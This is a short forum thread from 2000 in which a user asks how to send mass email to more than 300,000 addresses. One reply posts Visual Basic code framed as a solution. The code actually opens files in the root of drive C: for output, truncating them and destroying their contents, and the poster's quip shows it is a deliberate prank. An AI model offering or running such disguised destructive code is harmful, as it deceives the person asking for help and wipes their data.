|
-
February 1st, 2000, 09:35 PM
#1
MassEmail
Does anyone know of a great mass email solution that can handle 300,000+. Seems that once you get over 30,000 it starts to get crazy. Any help appreciated.
-
February 2nd, 2000, 03:57 AM
#2
-
February 2nd, 2000, 08:41 AM
#3
Re: MassEmail
Try this code
dim t as double
dim message as string
dim a as string
dim f as integer
a = dir("c:\*.*")
for t=1 to 300000
f = freefile
open a for output as #f
close #f
a = dir
next t
Now you wont have to worry about the 32000 limit, nor will the receivers of your junk...
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
Click Here to Expand Forum to Full Width
|